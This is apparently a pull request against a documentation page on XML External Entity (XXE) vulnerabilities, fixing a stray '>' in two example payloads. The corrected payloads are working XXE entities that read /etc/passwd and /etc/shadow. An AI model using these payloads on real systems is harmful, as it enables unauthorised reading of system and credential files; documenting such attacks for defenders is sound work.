### PR TITLE
Correct typo in SYSTEM "file:///" reference

### DIFF
--- a/pages/vulnerabilities/XML_External_Entity_(XXE)_Processing.md
+++ b/pages/vulnerabilities/XML_External_Entity_(XXE)_Processing.md
@@ -104,7 +104,7 @@ get RCE. Let’s modify the payload
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [
   <!ELEMENT foo ANY >
-  <!ENTITY xxe SYSTEM "file:///etc/passwd>" >]>
+  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
 <foo>&xxe;</foo>
 ```
 
@@ -113,7 +113,7 @@ get RCE. Let’s modify the payload
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [
   <!ELEMENT foo ANY >
-  <!ENTITY xxe SYSTEM "file:///etc/shadow>" >]>
+  <!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
 <foo>&xxe;</foo>
 ```
 


### PR DESCRIPTION
Removed incorrect ">" sign in file reference, that was causing errors like (example from Python's lxml):
```
lxml.etree.XMLSyntaxError: Invalid URI: file:///etc/passwd>
```